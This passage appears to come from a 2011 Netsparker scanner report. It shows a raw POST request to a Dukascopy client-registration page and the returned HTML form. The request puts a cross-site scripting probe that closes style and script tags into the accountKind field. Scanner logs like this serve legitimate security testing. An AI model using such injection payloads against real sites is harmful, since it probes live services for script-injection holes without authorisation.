Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: live-login.dukascopy.com
Content-Length: 265
Accept-Encoding: gzip, deflate

aData%5BSTRAT_REF%5D=-1&amp;aData%5BFEEDBACK_URL%5D=-1&amp;aData%5BTYPE%5D=1&amp;aData%5BaccountKind%5D=&apos;%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000168)%3c%2fscript%3e&amp;aData%5BHTTP_REFERER%5D=3&amp;backFormMarker=3&amp;currentFormMarker=step1&amp;nextFormMarker=step2
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 200 OK
Date: Thu, 17 Mar 2011 19:25:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.3.3
Transfer-Encoding: chunked
Content-Type: text/html; charset=windows-1252



&lt;html lang=&quot;en&quot;&gt;
  &lt;head&gt;
    &lt;title&gt;Client Registration&lt;/title&gt;
    &lt;META http-equiv=Content-Type content=&quot;text/html; charset=windows-1252&quot;&gt;
    &lt;script&gt;
      function init()  {
        fFillForm();
      }

      var bShowWaiting = true;

      function showWaiting()  {
        if(bShowWaiting)  {
          for (odj in document.body.childNodes)
            try  {
	            document.body.childNodes[odj].style.display = &apos;none&apos;;
	          }catch(e){}

	        oProgressDiv = document.createElement(&apos;div&apos;);
	        document.body.appendChild(oProgressDiv);
	        oProgressDiv.align = &apos;center&apos;;
	        oProgressDiv.innerHTML = &quot;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;Please, wait&lt;br/&gt;&quot;;

	        tmp = document.getElementById(&apos;progress_img&apos;)
	        oProgressImg = tmp.cloneNode(false);
	        oProgressImg.style.display = &apos;block&apos;;
	        oProgressDiv.appendChild(oProgressImg);
	        bShowWaiting = false;
	      }
      }

    function addEventHandler(obj, type, func, useCapture) {
        if (obj.addEventListener) {
            obj.addEventListener(type, func, useCapture);
            return true;
        }
        else if (obj.attachEvent) {
            var r = obj.attachEvent(&apos;on&apos; + type, func);
            return r;
    	}
        else {
            obj[&apos;on&apos; + type] = func;
        }
    }

    tipIndex = 0;
    function drawTip (sTip, width) {
        this.hideDelay = 600;
        this.sTip = sTip;
        this.hideTimeoutId = null;
        var oThis = this;

        this.show = function (event) {
            var oEvent = (event || window.event);
            if (oThis.hideTimeoutId) {
                window.clearTimeout(oThis.hideTimeoutId);
                return;
            } else if (oThis.oTipContainer.style.display == &quot;block&quot;) {
                return;
            }
            aSelects = document.getElementsByTagName(&apos;SELECT&apos;);
            for (i=0; i &lt; aSelects.length; i++)  {
                aSelects[i].style.visibility = &apos;hidden&apos;;
            }
            oThis.oTipContainer.style.top = oEvent.clientY - oThis.oTipContainer.offsetHeight - 2;
            oThis.oTipContainer.style.left = oEvent.clientX + 3;
            oThis.oTipContainer.style.display = &quot;block&quot;;
        }

        this.hide = function () {
            oThis.hideTimeoutId = null;
            oThis.oTipContainer.style.display = &quot;none&quot;;
            aSelects = document.getElementsByTagName(&apos;SELECT&apos;);
            for (i=0; i &lt; aSelects.length; i++)  {
                aSelects[i].style.visibility = &apos;&apos;;
            }
        }

        this.hideTimeouted = function () {
            oThis.hideTimeoutId = window.setTimeout(oThis.hide, oThis.hideDelay);
        }

        document.write(&apos;&lt;img src=&quot;../../images/icons/16x16/tip.png&quot; align=&quot;absmiddle&quot; height=&quot;16&quot; width=&quot;16&quot; border=&quot;0&quot; id=&quot;tipImg&apos; + tipIndex + &apos;&quot;/&gt;&apos;);
        document.write(&apos;&lt;div class=&quot;tip&quot; style=&quot;display:none;&quot; id=&quot;tipContainer&apos; + tipIndex + &apos;&quot;&gt;&apos; + sTip + &apos;&lt;/div&gt;&apos;);

        this.oTipImg = document.getElementById(&apos;tipImg&apos; + tipIndex);
        this.oTipContainer = document.getElementById(&apos;tipContainer&apos; + tipIndex);
        if (typeof(width) != &apos;undefined&apos;)
            this.oTipContainer.style.width = width;
        addEventHandler(this.oTipImg, &apos;mouseover&apos;, this.show);
        addEventHandler(this.oTipContainer, &apos;mouseover&apos;, this.show);
        addEventHandler(this.oTipImg, &apos;mouseout&apos;, this.hideTimeouted);
        addEventHandler(this.oTipContainer, &apos;mouseout&apos;, this.hideTimeouted);
        tipIndex++;
    }
    &lt;/script&gt;
    &lt;!--&lt;script src=&quot;js/lib.js&quot;&gt;&lt;/script&gt;
    &lt;script src=&quot;js/checkForm.js&quot;&gt;&lt;/script&gt;--&gt;
  &lt;style&gt;
  body, td, span, div, p, tr, th, option, font, button, input, select, textarea, b, i, a {
    font-size:8pt;
    font-family:Verdana;
  }
  table  {
   table-layout:fixed;
  }
  a  {
    font-weight:bold;
    text-decoration:underline;
    color:black;
  }

  a:hover  {
    color:#666666;
  }

  .header  {
    font-size:11pt;
    height:24px;
    color:#FFFFFF;
    font-weight:bold;
    text-align:center;
    background-image: url(&apos;https://www.dukascopy.com/swiss/inc/images/headline_bg_menu.gif&apos;);
    background-color:#000;
    background-position:0px 0px;
    background-repeat:repeat-x;
  }

  .header a  {
    color:#FFFFFF;
    font-weight:bold;
    text-decoration:none;
  }

  .header a:hover  {
    color:#FFFFFF;
    text-decoration:underline;
  }

  .subheader  {
    font-size:10pt;
    color:#333333;
    font-weight:bold;
    text-align:center;
    padding:5 0 0 0;
  }

 .subheader *  {
    font-size:10pt;
    font-weight:bold;
  }

  .step  {
    font-size:10pt;
    color:#999999;
    font-weight:bold;
    text-align:center;
    padding:5 0 5 0;
  }
  .error  {
    font-size:10pt;
    color:#EE0000;
    text-align:center;
    padding:5 0 5 0;
    font-weight:bold;
  }
  .title  {
    text-align:right;
    width:50%;
    padding:2 2 2 2;
    color:#1D4470;
  }
  .field  {
    text-align:left;
    width:50%;
    padding:2 22 2 2;
  }
  .buttons  {
    text-align:center;
    padding:4 4 4 4;
  }
  .button  {
    color:white;
    border:1px outset;
    cursor:pointer;
    background-color:#1D4470;
    width:100px;
    font-weight:bold;
    height:13pt;
  }
  .info  {
    text-align:center;
    padding-left:22;
    padding-right:22;
  }
  input.text  {
    width:100%;
    border-top:1px solid #cccccc;
    border-right:1px solid #cccccc;
    border-bottom:1px solid #cccccc;
    border-left:1px solid #cccccc;
  }
  input.checkbox {

  }
  textarea  {
    width:100%;
    border:1px solid #cccccc;
    font-size:8pt !important;
    font-weight:normal !important;
  }
  select {
    border:1px solid #cccccc;
  }

  .tip {
    position:absolute;
    border: 1px solid #333333;
    background-color: #FFFFE1;
    width: 250px;
    padding: 7px;
    text-align: justify;
    z-index:100;
  }

  &lt;/style&gt;
  &lt;/head&gt;
  &lt;body onLoad=&quot;init();&quot; onBeforeUnload=&quot;showWaiting();&quot; style=&quot;margin:0px;padding:0px;&quot;&gt;
  &lt;div style=&quot;background:url(&apos;https://www.dukascopy.com/pics/topBackground.png&apos;) repeat-x;&quot;&gt;&lt;img src=&quot;https://www.dukascopy.com/pics/headers/website_logo_bank.jpg&quot; alt=&quot;Dukascopy&quot; style=&quot;width:579px;height:103px;border:none;&quot;&gt;&lt;/div&gt;
  &lt;table width=&quot;100%&quot; align=&quot;center&quot; border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;&gt;
&lt;form style=&quot;margin:0px;padding:0px;&quot; name=&quot;mainForm&quot; action=&quot;/fo/register/live/index.php&quot; method=&quot;post&quot;&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;header&quot;&gt;
      Client Registration
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;step&quot;&gt;
      Step 1 of 6-12
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot;&gt;
      &lt;div class=&quot;error&quot; id=topError&gt;
      	      &lt;div&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&quot;title&quot; valign=&quot;top&quot;&gt;
      Date:
    &lt;/td&gt;
    &lt;td class=&quot;field&quot; valign=&quot;top&quot;&gt;
      Thu, 17 Mar 2011    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&quot;title&quot; valign=&quot;top&quot;&gt;
      Status:
    &lt;/td&gt;
    &lt;script&gt;
    	function radioClickControll() {
    		var retAcc = document.getElementById(&apos;radio_accountKind_6&apos;);
    		var stAcc  = document.getElementById(&apos;radio_accountKind_7&apos;);
    		var rInd   = document.getElementById(&apos;radio_type_1&apos;);
    		var rJoint = document.getElementById(&apos;radio_type_3&apos;);
    		var rLegal = document.getElementById(&apos;radio_type_2&apos;);

    		if(retAcc.checked) {
    			rLegal.disabled = true;
    		}
    		if(stAcc.checked) {
    			rLegal.disabled = false;
    		}

    		if(rLegal.checked) {
    			retAcc.disabled = true;
    		} 
    		if(rInd.checked || rJoint.checked) { 
    			retAcc.disabled = false;
    		}

    		
    	}
    &lt;/script&gt;
    &lt;td class=&quot;field&quot; valign=&quot;top&quot;&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;aData[STRAT_REF]&quot; value=&quot;-1&quot;&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;aData[FEEDBACK_URL]&quot; value=&quot;-1&quot;&gt;
      &lt;input type=&quot;radio&quot; name=&quot;aData[TYPE]&quot; id=&quot;radio_type_1&quot; value=&quot;1&quot; checked onclick=&quot;radioClickControll()&quot;&gt; &lt;label for=&quot;radio_type_1&quot;&gt;For Individuals&lt;/label&gt;&lt;br/&gt;
      &lt;input type=&quot;radio&quot; name=&quot;aData[TYPE]&quot; id=&quot;radio_type_3&quot; value=&quot;3&quot; onclick=&quot;radioClickControll()&quot;&gt; &lt;label for=&quot;radio_type_3&quot;&gt;For Joint Account&lt;/label&gt;&lt;br/&gt;
      &lt;input type=&quot;radio&quot; name=&quot;aData[TYPE]&quot; id=&quot;radio_type_2&quot; value=&quot;2&quot; onclick=&quot;radioClickControll()&quot;&gt; &lt;label for=&quot;radio_type_2&quot;&gt;For Legal Entities&lt;/label&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&quot;title&quot; valign=&quot;top&quot;&gt;
      Kind of account:
    &lt;/td&gt;
    &lt;td class=&quot;field&quot; valign=&quot;top&quot;&gt;
      &lt;script&gt;
        function fSetManagedAccountStrategyMode(bShown)  {
          oInp = document.getElementById(&apos;sel_managedAccountStrategy&apos;);
          oInp.disabled = !bShown;
          oInp.style.display = (bShown?&quot;&quot;:&quot;none&quot;);
          if(bShown) {
          	document.getElementById(&apos;servProvider0&apos;).checked = false;
          }
        }
        
        function fSetServProviderMode(bShown)  {
          oInp = document.getElementById(&apos;sel_servProvider&apos;);
          oInp.disabled = !bShown;
          oInp.style.display = (bShown?&quot;&quot;:&quot;none&quot;);
          if(bShown) {
          	document.getElementById(&apos;extManContact0&apos;).checked = false;
          } 
        }
      &lt;/script&gt;
      &lt;table border=&quot;0&quot; cellpadding=&quot;1&quot; cellspacing=&quot;0&quot; style=&quot;table-layout:auto;&quot;&gt;
        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;&quot; style=display:none checked&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;6&quot; id=&quot;radio_accountKind_6&quot;  onClick=&quot;radioClickControll();fSetServProviderMode(false);fSetManagedAccountStrategyMode(false);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_6&quot;&gt;Retail Account&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        
        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;7&quot; id=&quot;radio_accountKind_7&quot;   onClick=&quot;radioClickControll();fSetServProviderMode(false);fSetManagedAccountStrategyMode(false);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_7&quot;&gt;Standard Account (from 50 000 USD)&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        
        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;100&quot; id=&quot;radio_accountKind_100&quot;  onClick=&quot;fSetServProviderMode(false);fSetManagedAccountStrategyMode(true);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_100&quot;&gt;Managed Account&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
        &lt;td&gt;&lt;/td&gt;
          &lt;td valign=&quot;top&quot; id=&quot;sel_managedAccountStrategy&quot; style=&quot;display:none;&quot; disabled&gt;
			          
            &lt;b&gt;Whilst selecting your Manager/Attorney and for convenience purposes only you may use the pull-down menu. Dukascopy has not performed any competence verification or due diligence, does not issue any recommendation concerning your Manager/Attorney and can not be held liable for any losses, direct and indirect damages whether financial or not, resulting from your Manager/Attorney&amp;#039;s acts or omissions.&lt;/b&gt;&lt;br&gt;
            &lt;select name=&quot;aData[managedAccountStrategy]&quot; id=&quot;sel_mas&quot;&gt;
		      &lt;option value=&apos;1ABEM3&apos; &gt;&amp;nbsp;1ABEM3&lt;/option&gt;
&lt;option value=&apos;356JFH1&apos; &gt;&amp;nbsp;356JFH1&lt;/option&gt;
&lt;option value=&apos;356JFH2&apos; &gt;&amp;nbsp;356JFH2&lt;/option&gt;
&lt;option value=&apos;356JFH3&apos; &gt;&amp;nbsp;356JFH3&lt;/option&gt;
&lt;option value=&apos;356JFH4&apos; &gt;&amp;nbsp;356JFH4&lt;/option&gt;
&lt;option value=&apos;356JFH5&apos; &gt;&amp;nbsp;356JFH5&lt;/option&gt;
&lt;option value=&apos;3SFX1&apos; &gt;&amp;nbsp;3SFX1&lt;/option&gt;
&lt;option value=&apos;3SFX2&apos; &gt;&amp;nbsp;3SFX2&lt;/option&gt;
&lt;option value=&apos;45GHKLBV&apos; &gt;&amp;nbsp;45GHKLBV&lt;/option&gt;
&lt;option value=&apos;AADB88&apos; &gt;&amp;nbsp;AADB88&lt;/option&gt;
&lt;option value=&apos;ABBB22&apos; &gt;&amp;nbsp;ABBB22&lt;/option&gt;
&lt;option value=&apos;ABEF73&apos; &gt;&amp;nbsp;ABEF73&lt;/option&gt;
&lt;option value=&apos;AEAC86&apos; &gt;&amp;nbsp;AEAC86&lt;/option&gt;
&lt;option value=&apos;AECC31&apos; &gt;&amp;nbsp;AECC31&lt;/option&gt;
&lt;option value=&apos;ALPX&apos; &gt;&amp;nbsp;ALPX&lt;/option&gt;
&lt;option value=&apos;ALTV&apos; &gt;&amp;nbsp;ALTV&lt;/option&gt;
&lt;option value=&apos;ARCH&apos; &gt;&amp;nbsp;ARCH&lt;/option&gt;
&lt;option value=&apos;ARXX&apos; &gt;&amp;nbsp;ARXX&lt;/option&gt;
&lt;option value=&apos;AZAT681&apos; &gt;&amp;nbsp;AZAT681&lt;/option&gt;
&lt;option value=&apos;Augustan&apos; &gt;&amp;nbsp;Augustan&lt;/option&gt;
&lt;option value=&apos;BABC92&apos; &gt;&amp;nbsp;BABC92&lt;/option&gt;
&lt;option value=&apos;BADF84&apos; &gt;&amp;nbsp;BADF84&lt;/option&gt;
&lt;option value=&apos;BAYWM&apos; &gt;&amp;nbsp;BAYWM&lt;/option&gt;
&lt;option value=&apos;BCAD67&apos; &gt;&amp;nbsp;BCAD67&lt;/option&gt;
&lt;option value=&apos;BCBC72&apos; &gt;&amp;nbsp;BCBC72&lt;/option&gt;
&lt;option value=&apos;BCCA82&apos; &gt;&amp;nbsp;BCCA82&lt;/option&gt;
&lt;option value=&apos;BCEE55&apos; &gt;&amp;nbsp;BCEE55&lt;/option&gt;
&lt;option value=&apos;BDAD35&apos; &gt;&amp;nbsp;BDAD35&lt;/option&gt;
&lt;option value=&apos;BDCC70&apos; &gt;&amp;nbsp;BDCC70&lt;/option&gt;
&lt;option value=&apos;BDCP&apos; &gt;&amp;nbsp;BDCP&lt;/option&gt;
&lt;option value=&apos;BEAD70&apos; &gt;&amp;nbsp;BEAD70&lt;/option&gt;
&lt;option value=&apos;BEAF55&apos; &gt;&amp;nbsp;BEAF55&lt;/option&gt;
&lt;option value=&apos;BECF19&apos; &gt;&amp;nbsp;BECF19&lt;/option&gt;
&lt;option value=&apos;BEDD59&apos; &gt;&amp;nbsp;BEDD59&lt;/option&gt;
&lt;option value=&apos;BEEE43&apos; &gt;&amp;nbsp;BEEE43&lt;/option&gt;
&lt;option value=&apos;BRKIC&apos; &gt;&amp;nbsp;BRKIC&lt;/option&gt;
&lt;option value=&apos;BUSH&apos; &gt;&amp;nbsp;BUSH&lt;/option&gt;
&lt;option value=&apos;BUSH288&apos; &gt;&amp;nbsp;BUSH288&lt;/option&gt;
&lt;option value=&apos;CBFB47&apos; &gt;&amp;nbsp;CBFB47&lt;/option&gt;
&lt;option value=&apos;CCDE32&apos; &gt;&amp;nbsp;CCDE32&lt;/option&gt;
&lt;option value=&apos;CCPFX&apos; &gt;&amp;nbsp;CCPFX&lt;/option&gt;
&lt;option value=&apos;CDCD88&apos; &gt;&amp;nbsp;CDCD88&lt;/option&gt;
&lt;option value=&apos;CDFD34&apos; &gt;&amp;nbsp;CDFD34&lt;/option&gt;
&lt;option value=&apos;CEDD62&apos; &gt;&amp;nbsp;CEDD62&lt;/option&gt;
&lt;option value=&apos;CEFA67&apos; &gt;&amp;nbsp;CEFA67&lt;/option&gt;
&lt;option value=&apos;CEFF58&apos; &gt;&amp;nbsp;CEFF58&lt;/option&gt;
&lt;option value=&apos;CFEC46&apos; &gt;&amp;nbsp;CFEC46&lt;/option&gt;
&lt;option value=&apos;CFFX&apos; &gt;&amp;nbsp;CFFX&lt;/option&gt;
&lt;option value=&apos;CGFX&apos; &gt;&amp;nbsp;CGFX&lt;/option&gt;
&lt;option value=&apos;CHBC&apos; &gt;&amp;nbsp;CHBC&lt;/option&gt;
&lt;option value=&apos;CLMFX&apos; &gt;&amp;nbsp;CLMFX&lt;/option&gt;
&lt;option value=&apos;CurrClub&apos; &gt;&amp;nbsp;CurrClub&lt;/option&gt;
&lt;option value=&apos;DADD65&apos; &gt;&amp;nbsp;DADD65&lt;/option&gt;
&lt;option value=&apos;DBAA26&apos; &gt;&amp;nbsp;DBAA26&lt;/option&gt;
&lt;option value=&apos;DBAF77&apos; &gt;&amp;nbsp;DBAF77&lt;/option&gt;
&lt;option value=&apos;DBFB93&apos; &gt;&amp;nbsp;DBFB93&lt;/option&gt;
&lt;option value=&apos;DCCD84&apos; &gt;&amp;nbsp;DCCD84&lt;/option&gt;
&lt;option value=&apos;DCEC93&apos; &gt;&amp;nbsp;DCEC93&lt;/option&gt;
&lt;option value=&apos;DDBF26&apos; &gt;&amp;nbsp;DDBF26&lt;/option&gt;
&lt;option value=&apos;DDCC49&apos; &gt;&amp;nbsp;DDCC49&lt;/option&gt;
&lt;option value=&apos;DDDB32&apos; &gt;&amp;nbsp;DDDB32&lt;/option&gt;
&lt;option value=&apos;DEFD33&apos; &gt;&amp;nbsp;DEFD33&lt;/option&gt;
&lt;option value=&apos;DF56NB&apos; &gt;&amp;nbsp;DF56NB&lt;/option&gt;
&lt;option value=&apos;DF794J0&apos; &gt;&amp;nbsp;DF794J0&lt;/option&gt;
&lt;option value=&apos;DFAF50&apos; &gt;&amp;nbsp;DFAF50&lt;/option&gt;
&lt;option value=&apos;DG785&apos; &gt;&amp;nbsp;DG785&lt;/option&gt;
&lt;option value=&apos;DOXX&apos; &gt;&amp;nbsp;DOXX&lt;/option&gt;
&lt;option value=&apos;DRFX1&apos; &gt;&amp;nbsp;DRFX1&lt;/option&gt;
&lt;option value=&apos;DSBP&apos; &gt;&amp;nbsp;DSBP&lt;/option&gt;
&lt;option value=&apos;EACE93&apos; &gt;&amp;nbsp;EACE93&lt;/option&gt;
&lt;option value=&apos;EADA74&apos; &gt;&amp;nbsp;EADA74&lt;/option&gt;
&lt;option value=&apos;EAEE21&apos; &gt;&amp;nbsp;EAEE21&lt;/option&gt;
&lt;option value=&apos;EAFD36&apos; &gt;&amp;nbsp;EAFD36&lt;/option&gt;
&lt;option value=&apos;EBAD44&apos; &gt;&amp;nbsp;EBAD44&lt;/option&gt;
&lt;option value=&apos;EBBB34&apos; &gt;&amp;nbsp;EBBB34&lt;/option&gt;
&lt;option value=&apos;EBDE90&apos; &gt;&amp;nbsp;EBDE90&lt;/option&gt;
&lt;option value=&apos;ECURRENTZ&apos; &gt;&amp;nbsp;ECURRENTZ&lt;/option&gt;
&lt;option value=&apos;EDCC46&apos; &gt;&amp;nbsp;EDCC46&lt;/option&gt;
&lt;option value=&apos;EFAF70&apos; &gt;&amp;nbsp;EFAF70&lt;/option&gt;
&lt;option value=&apos;EFBB17&apos; &gt;&amp;nbsp;EFBB17&lt;/option&gt;
&lt;option value=&apos;EFCA50&apos; &gt;&amp;nbsp;EFCA50&lt;/option&gt;
&lt;option value=&apos;EFCA92&apos; &gt;&amp;nbsp;EFCA92&lt;/option&gt;
&lt;option value=&apos;FAAC62&apos; &gt;&amp;nbsp;FAAC62&lt;/option&gt;
&lt;option value=&apos;FBDB80&apos; &gt;&amp;nbsp;FBDB80&lt;/option&gt;
&lt;option value=&apos;FBDF30&apos; &gt;&amp;nbsp;FBDF30&lt;/option&gt;
&lt;option value=&apos;FBED79&apos; &gt;&amp;nbsp;FBED79&lt;/option&gt;
&lt;option value=&apos;FBFA65&apos; &gt;&amp;nbsp;FBFA65&lt;/option&gt;
&lt;option value=&apos;FCCA80&apos; &gt;&amp;nbsp;FCCA80&lt;/option&gt;
&lt;option value=&apos;FDAG&apos; &gt;&amp;nbsp;FDAG&lt;/option&gt;
&lt;option value=&apos;FEEC47&apos; &gt;&amp;nbsp;FEEC47&lt;/option&gt;
&lt;option value=&apos;FFFF98&apos; &gt;&amp;nbsp;FFFF98&lt;/option&gt;
&lt;option value=&apos;FGB1WFM&apos; &gt;&amp;nbsp;FGB1WFM&lt;/option&gt;
&lt;option value=&apos;FGH7GB&apos; &gt;&amp;nbsp;FGH7GB&lt;/option&gt;
&lt;option value=&apos;FGH90IK&apos; &gt;&amp;nbsp;FGH90IK&lt;/option&gt;
&lt;option value=&apos;FIBX1&apos; &gt;&amp;nbsp;FIBX1&lt;/option&gt;
&lt;option value=&apos;FORMA&apos; &gt;&amp;nbsp;FORMA&lt;/option&gt;
&lt;option value=&apos;FORT&apos; &gt;&amp;nbsp;FORT&lt;/option&gt;
&lt;option value=&apos;FRAPX&apos; &gt;&amp;nbsp;FRAPX&lt;/option&gt;
&lt;option value=&apos;FTAM&apos; &gt;&amp;nbsp;FTAM&lt;/option&gt;
&lt;option value=&apos;FXDASH1A&apos; &gt;&amp;nbsp;FXDASH1A&lt;/option&gt;
&lt;option value=&apos;FXG1&apos; &gt;&amp;nbsp;FXG1&lt;/option&gt;
&lt;option value=&apos;FXMN&apos; &gt;&amp;nbsp;FXMN&lt;/option&gt;
&lt;option value=&apos;FXPOR&apos; &gt;&amp;nbsp;FXPOR&lt;/option&gt;
&lt;option value=&apos;FXRGC&apos; &gt;&amp;nbsp;FXRGC&lt;/option&gt;
&lt;option value=&apos;G7NV&apos; &gt;&amp;nbsp;G7NV&lt;/option&gt;
&lt;option value=&apos;GHJKL76&apos; &gt;&amp;nbsp;GHJKL76&lt;/option&gt;
&lt;option value=&apos;GLCM&apos; &gt;&amp;nbsp;GLCM&lt;/option&gt;
&lt;option value=&apos;GSYE&apos; &gt;&amp;nbsp;GSYE&lt;/option&gt;
&lt;option value=&apos;GTG67H&apos; &gt;&amp;nbsp;GTG67H&lt;/option&gt;
&lt;option value=&apos;GTXX&apos; &gt;&amp;nbsp;GTXX&lt;/option&gt;
&lt;option value=&apos;HJH768&apos; &gt;&amp;nbsp;HJH768&lt;/option&gt;
&lt;option value=&apos;HKJBXF&apos; &gt;&amp;nbsp;HKJBXF&lt;/option&gt;
&lt;option value=&apos;HRAPX&apos; &gt;&amp;nbsp;HRAPX&lt;/option&gt;
&lt;option value=&apos;HUSK&apos; &gt;&amp;nbsp;HUSK&lt;/option&gt;
&lt;option value=&apos;IDTX&apos; &gt;&amp;nbsp;IDTX&lt;/option&gt;
&lt;option value=&apos;IDTX1&apos; &gt;&amp;nbsp;IDTX1&lt;/option&gt;
&lt;option value=&apos;IDTX2&apos; &gt;&amp;nbsp;IDTX2&lt;/option&gt;
&lt;option value=&apos;IDTX3&apos; &gt;&amp;nbsp;IDTX3&lt;/option&gt;
&lt;option value=&apos;INHH&apos; &gt;&amp;nbsp;INHH&lt;/option&gt;
&lt;option value=&apos;ITASCA&apos; &gt;&amp;nbsp;ITASCA&lt;/option&gt;
&lt;option value=&apos;JDCFX&apos; &gt;&amp;nbsp;JDCFX&lt;/option&gt;
&lt;option value=&apos;JLS&apos; &gt;&amp;nbsp;JLS&lt;/option&gt;
&lt;option value=&apos;JSDM&apos; &gt;&amp;nbsp;JSDM&lt;/option&gt;
&lt;option value=&apos;KRCM1&apos; &gt;&amp;nbsp;KRCM1&lt;/option&gt;
&lt;option value=&apos;KRCM2&apos; &gt;&amp;nbsp;KRCM2&lt;/option&gt;
&lt;option value=&apos;LBMFX&apos; &gt;&amp;nbsp;LBMFX&lt;/option&gt;
&lt;option value=&apos;LBXX2&apos; &gt;&amp;nbsp;LBXX2&lt;/option&gt;
&lt;option value=&apos;LMXX&apos; &gt;&amp;nbsp;LMXX&lt;/option&gt;
&lt;option value=&apos;LivIn&apos; &gt;&amp;nbsp;LivIn&lt;/option&gt;
&lt;option value=&apos;MASI&apos; &gt;&amp;nbsp;MASI&lt;/option&gt;
&lt;option value=&apos;MBCM&apos; &gt;&amp;nbsp;MBCM&lt;/option&gt;
&lt;option value=&apos;MBCO&apos; &gt;&amp;nbsp;MBCO&lt;/option&gt;
&lt;option value=&apos;MDLV&apos; &gt;&amp;nbsp;MDLV&lt;/option&gt;
&lt;option value=&apos;MEIDAO&apos; &gt;&amp;nbsp;MEIDAO&lt;/option&gt;
&lt;option value=&apos;NK71&apos; &gt;&amp;nbsp;NK71&lt;/option&gt;
&lt;option value=&apos;NKHFX&apos; &gt;&amp;nbsp;NKHFX&lt;/option&gt;
&lt;option value=&apos;OANFx5&apos; &gt;&amp;nbsp;OANFx5&lt;/option&gt;
&lt;option value=&apos;OANFx55&apos; &gt;&amp;nbsp;OANFx55&lt;/option&gt;
&lt;option value=&apos;OGFX&apos; &gt;&amp;nbsp;OGFX&lt;/option&gt;
&lt;option value=&apos;PAXX&apos; &gt;&amp;nbsp;PAXX&lt;/option&gt;
&lt;option value=&apos;PORFX&apos; &gt;&amp;nbsp;PORFX&lt;/option&gt;
&lt;option value=&apos;PRSP&apos; &gt;&amp;nbsp;PRSP&lt;/option&gt;
&lt;option value=&apos;PURK1&apos; &gt;&amp;nbsp;PURK1&lt;/option&gt;
&lt;option value=&apos;RGCSR&apos; &gt;&amp;nbsp;RGCSR&lt;/option&gt;
&lt;option value=&apos;RJPFX&apos; &gt;&amp;nbsp;RJPFX&lt;/option&gt;
&lt;option value=&apos;RMJ&apos; &gt;&amp;nbsp;RMJ&lt;/option&gt;
&lt;option value=&apos;RNKFX&apos; &gt;&amp;nbsp;RNKFX&lt;/option&gt;
&lt;option value=&apos;ROXX&apos; &gt;&amp;nbsp;ROXX&lt;/option&gt;
&lt;option value=&apos;RSFX&apos; &gt;&amp;nbsp;RSFX&lt;/option&gt;
&lt;option value=&apos;RUSLION&apos; &gt;&amp;nbsp;RUSLION&lt;/option&gt;
&lt;option value=&apos;Rio2016&apos; &gt;&amp;nbsp;Rio2016&lt;/option&gt;
&lt;option value=&apos;SARK&apos; &gt;&amp;nbsp;SARK&lt;/option&gt;
&lt;option value=&apos;SEP1&apos; &gt;&amp;nbsp;SEP1&lt;/option&gt;
&lt;option value=&apos;SKUSN&apos; &gt;&amp;nbsp;SKUSN&lt;/option&gt;
&lt;option value=&apos;SMXX&apos; &gt;&amp;nbsp;SMXX&lt;/option&gt;
&lt;option value=&apos;SOUK&apos; &gt;&amp;nbsp;SOUK&lt;/option&gt;
&lt;option value=&apos;SRVFX&apos; &gt;&amp;nbsp;SRVFX&lt;/option&gt;
&lt;option value=&apos;STAC&apos; &gt;&amp;nbsp;STAC&lt;/option&gt;
&lt;option value=&apos;STAR+&apos; &gt;&amp;nbsp;STAR+&lt;/option&gt;
&lt;option value=&apos;SVTL&apos; &gt;&amp;nbsp;SVTL&lt;/option&gt;
&lt;option value=&apos;TC4ET&apos; &gt;&amp;nbsp;TC4ET&lt;/option&gt;
&lt;option value=&apos;TFGINC&apos; &gt;&amp;nbsp;TFGINC&lt;/option&gt;
&lt;option value=&apos;VASCON1&apos; &gt;&amp;nbsp;VASCON1&lt;/option&gt;
&lt;option value=&apos;VASCON2&apos; &gt;&amp;nbsp;VASCON2&lt;/option&gt;
&lt;option value=&apos;VASCON3&apos; &gt;&amp;nbsp;VASCON3&lt;/option&gt;
&lt;option value=&apos;VFGL5112&apos; &gt;&amp;nbsp;VFGL5112&lt;/option&gt;
&lt;option value=&apos;VHGLNM678&apos; &gt;&amp;nbsp;VHGLNM678&lt;/option&gt;
&lt;option value=&apos;VKCS52&apos; &gt;&amp;nbsp;VKCS52&lt;/option&gt;
&lt;option value=&apos;VNG409CG&apos; &gt;&amp;nbsp;VNG409CG&lt;/option&gt;
&lt;option value=&apos;Vulov10&apos; &gt;&amp;nbsp;Vulov10&lt;/option&gt;
&lt;option value=&apos;W2WFX&apos; &gt;&amp;nbsp;W2WFX&lt;/option&gt;
